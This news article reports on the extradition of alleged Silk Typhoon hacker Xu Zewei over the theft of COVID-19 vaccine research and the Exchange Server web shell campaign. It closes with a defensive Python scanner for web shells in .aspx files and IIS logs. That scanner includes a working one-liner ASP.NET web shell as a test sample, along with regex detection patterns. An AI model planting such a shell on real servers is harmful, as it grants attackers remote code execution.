Silk Typhoon Hacker Extradited to U.S. for COVID Vaccine Theft
Chinese national Xu Zewei faces nine federal counts after extradition from Italy for alleged role in Silk Typhoon attacks stealing COVID-19 vaccine research from U.S. universities and research institutions.
A 34-year-old Chinese national accused of orchestrating cyberattacks against U.S. COVID-19 vaccine researchers made his first court appearance Monday after being extradited from Italy. Xu Zewei pleaded not guilty to all nine charges, claiming the arrest was a case of mistaken identity.
Federal prosecutors allege Xu operated as part of Silk Typhoon, the Chinese state-sponsored hacking group that Microsoft tracks as one of the most prolific threat actors targeting Western research institutions. The indictment connects him to attacks spanning February 2020 through June 2021—a period when COVID-19 vaccine development was a global priority.
The Charges
Xu faces nine federal counts including wire fraud, conspiracy to damage protected computers, and aggravated identity theft. If convicted on all charges, he faces decades in federal prison.
According to the indictment, Xu and his co-conspirators "hacked and otherwise targeted U.S.-based universities, immunologists, and virologists conducting research into COVID-19 vaccines, treatment, and testing" beginning in early 2020. A Texas university was specifically named as a victim, with attackers exfiltrating vaccine-related research data.
His co-defendant, Chinese national Zhang Yu, remains at large. Both allegedly worked at Shanghai Powerock Network Co. Ltd. and operated at the direction of the Shanghai State Security Bureau, the Shanghai branch of China's Ministry of State Security.
The Hafnium Connection
The attack methods align with techniques Microsoft attributed to Silk Typhoon, the group it previously tracked as Hafnium, when it disclosed the mass exploitation of Exchange Server zero-days in March 2021. Beginning in late 2020, Xu's group allegedly "exploited certain vulnerabilities in Microsoft Exchange Server" to deploy web shells that provided persistent remote access.
Those Exchange Server vulnerabilities became some of the most widely exploited flaws in recent memory, affecting tens of thousands of organizations globally. While Silk Typhoon's initial targets were research institutions, other threat actors piled onto the same flaws within days of the disclosure, ransomware operators among them, and the web shells abandoned on unpatched servers remained a ready-made entry point for anyone who found them. The problem was serious enough that in April 2021 the FBI obtained court authorization to remove remaining web shells from hundreds of U.S. servers.
The Exchange attacks represented a shift in Chinese cyber operations toward more aggressive, widespread targeting. Rather than surgical strikes against specific high-value targets, Silk Typhoon cast a wide net and sorted through compromised organizations afterward.
Extradition and Legal Proceedings
Italian authorities arrested Xu in Milan in July 2025, on a U.S. warrant, while he was traveling outside China. The extradition took roughly ten months, with Xu contesting the transfer in Italian courts.
His defense attorney stated that Xu "categorically denies any involvement" in the alleged hacking activities and maintains the case is one of mistaken identity. Chinese government officials have not commented on the arrest.
The successful extradition marks a significant development in U.S. efforts to prosecute Chinese cyber actors. Most indictments against Chinese hackers result in charges filed against individuals who never leave China and face no realistic prospect of arrest. Catching an alleged operator while traveling represents a rare opportunity for prosecution.
State-Sponsored IP Theft
The COVID-19 vaccine research theft fits a well-documented pattern of Chinese state-sponsored intellectual property targeting. During the pandemic's early months, multiple security vendors reported increased Chinese APT activity against pharmaceutical companies, research universities, and government health agencies.
The timing was no coincidence. China's domestic vaccine development efforts lagged behind Western programs, creating strategic incentive to acquire research through cyber operations. By mid-2020, Silk Typhoon was one of several Chinese groups actively targeting vaccine research.
Structurally, the case resembles the espionage campaigns run by Russian state actors against political and military targets. The difference is the objective: commercial and scientific intellectual property rather than political intelligence.
Why This Matters
Xu's prosecution represents one of the few instances where a Chinese cyber operator will face an American courtroom. Most indictments of Chinese state hackers are unsealed against defendants who remain in China, where they serve as public attribution and diplomatic messaging rather than as a path to trial. An indictment that is actually meant to lead to an arrest is kept sealed until the defendant travels somewhere an arrest is possible.
The case also highlights the continued challenge of attribution and prosecution in state-sponsored hacking. Despite years of evidence linking Chinese military and intelligence units to cyber espionage, prosecutions remain rare. When they do occur, they typically require an operational error—like international travel—that exposes the individual to arrest.
For security teams, the Silk Typhoon case underscores that nation-state actors remain actively interested in research institutions, healthcare organizations, and any entity holding valuable intellectual property. The threat didn't end with COVID-19 vaccine development. Chinese APT groups have since broadened their targeting to semiconductor research, AI development, and quantum computing.
Organizations in these sectors should confirm their Exchange Server patch status, test their ability to detect web shells in Exchange's web-facing directories, and review IIS and authentication logs for POST requests to unexpected .aspx files and for access that persisted after the initial intrusion window. The techniques Xu allegedly used remain effective against unpatched systems, and Silk Typhoon continues operating despite this prosecution.
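The two checks above, web shell detection and a review of web-server logs for persistent access, are concrete enough to show in code. The following is an added example written for this article; it is not code from the article, from Microsoft, or from any vendor tool. It implements two triage routines: a source scanner that flags ASP.NET pages which hand request input to `eval` (the one-liner style of web shell reported in the 2021 Exchange campaign), and an IIS W3C log scanner that flags POSTs to unexpected .aspx files in directories that should only serve Exchange's own pages. The watched directories, the allow-list of legitimate pages, the indicator regexes and all sample data are assumptions constructed for the demo and should be tuned to a real deployment.

```python
"""Heuristic web shell triage for Exchange front-end directories.

Added example, not from the article or any vendor tool. Two offline checks:
  1. scan_aspx_source(): flag ASP.NET source that feeds request input to eval
     or spawns a process (the China Chopper / one-liner web shell pattern).
  2. scan_iis_log(): flag POSTs to .aspx pages in directories that should only
     serve Exchange's own auth/static content.
WATCHED_DIRS, KNOWN_PAGES, the regexes and the sample data are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Front-end paths where dropped web shells were commonly reported (assumption;
# tune to your deployment).
WATCHED_DIRS = ("/aspnet_client/", "/owa/auth/", "/ecp/auth/")

# Legitimate Exchange pages that live in those directories (assumed allow-list).
KNOWN_PAGES = {"logon.aspx", "logoff.aspx", "errorfe.aspx", "expiredpassword.aspx"}

# Source-level indicators: (name, compiled regex). Matching is triage, not proof;
# obfuscated shells will evade simple patterns.
SOURCE_INDICATORS = [
    ("eval_of_request", re.compile(r"eval\s*\(\s*Request", re.I)),
    ("request_item_index", re.compile(r"Request\.Item\s*\[", re.I)),
    ("jscript_page", re.compile(r'Page\s+Language\s*=\s*"?JScript"?', re.I)),
    ("unsafe_eval", re.compile(r'"unsafe"\s*\)', re.I)),
    ("process_start", re.compile(r"System\.Diagnostics\.Process", re.I)),
]


def scan_aspx_source(source: str) -> list[str]:
    """Return the names of every indicator that matches the .aspx source."""
    return [name for name, rx in SOURCE_INDICATORS if rx.search(source)]


@dataclass(frozen=True)
class Hit:
    time: str
    client_ip: str
    method: str
    uri: str
    status: str
    reason: str


def parse_iis_line(line: str, fields: list[str]) -> dict[str, str] | None:
    """Split one W3C extended log line according to the #Fields header."""
    parts = line.split(" ")
    if len(parts) != len(fields):
        return None  # malformed or truncated line; skip rather than guess
    return dict(zip(fields, parts))


def scan_iis_log(lines: list[str]) -> list[Hit]:
    """Flag POSTs to .aspx pages under watched dirs that are not known pages."""
    fields: list[str] = []
    hits: list[Hit] = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = parse_iis_line(line, fields)
        if rec is None:
            continue
        uri = rec["cs-uri-stem"].lower()
        if rec["cs-method"].upper() != "POST" or not uri.endswith(".aspx"):
            continue
        page = uri.rsplit("/", 1)[-1]
        if any(uri.startswith(d) for d in WATCHED_DIRS) and page not in KNOWN_PAGES:
            hits.append(Hit(rec["time"], rec["c-ip"], rec["cs-method"],
                            rec["cs-uri-stem"], rec["sc-status"],
                            "POST to non-Exchange .aspx in watched directory"))
    return hits


# Constructed samples: a one-liner web shell and a benign maintenance page.
SAMPLE_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["pwd"],"unsafe");%>'
SAMPLE_BENIGN = '<%@ Page Language="C#" %><html><body>Maintenance page</body></html>'

# Constructed IIS W3C log excerpt; field order is given by the header line.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2021-03-03 04:12:01 10.0.0.5 GET /owa/auth/logon.aspx url=/owa/ 443 - 198.51.100.7 Mozilla/5.0 200",
    "2021-03-03 04:12:09 10.0.0.5 POST /owa/auth/logon.aspx - 443 - 198.51.100.7 Mozilla/5.0 302",
    "2021-03-03 04:15:33 10.0.0.5 POST /aspnet_client/system_web/help.aspx - 443 - 203.0.113.44 python-requests/2.25.1 200",
    "2021-03-03 04:16:02 10.0.0.5 POST /owa/auth/Current/themes/resources/logon.css - 443 - 203.0.113.44 python-requests/2.25.1 200",
]

if __name__ == "__main__":
    print("shell indicators:", scan_aspx_source(SAMPLE_SHELL))
    print("benign indicators:", scan_aspx_source(SAMPLE_BENIGN))
    for hit in scan_iis_log(SAMPLE_LOG):
        print(f"{hit.time} {hit.client_ip} {hit.method} {hit.uri} {hit.status}: {hit.reason}")
```

In practice, feed `scan_aspx_source` every .aspx file under the Exchange front-end and `inetpub` trees, and `scan_iis_log` the raw W3C logs from the IIS log directory. A file that scores zero can still be malicious (obfuscated or compiled shells will not match these regexes), so treat the output as a triage queue and corroborate it with file creation times against maintenance windows and with Exchange's own HttpProxy logs.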
Related Articles
Phantom Taurus Deploys Net-Star Backdoors Across Africa (Apr 4, 2026): Unit 42 exposes Phantom Taurus, a Chinese APT targeting embassies and foreign ministries with fileless NET-STAR malware. The group resurfaces within hours after discovery.
Salt Typhoon Affiliate Hits Telecoms in 30+ Countries With TernDoor (Mar 13, 2026): China-linked UAT-9244 deploys TernDoor backdoor and peer-to-peer implants against telecom infrastructure across South America, North America, and Europe.
Salt Typhoon Breaches Congressional Committee Staff Emails (Jan 12, 2026): Chinese state hackers accessed email accounts of House staffers working on China, foreign affairs, and defense. The intrusion was discovered in December.
Cisco Talos Exposes UAT-7290: China APT Targeting Telecoms (Jan 8, 2026): Newly disclosed threat actor compromises telecom providers in South Asia and Southeastern Europe, establishing relay infrastructure for other Chinese APT groups.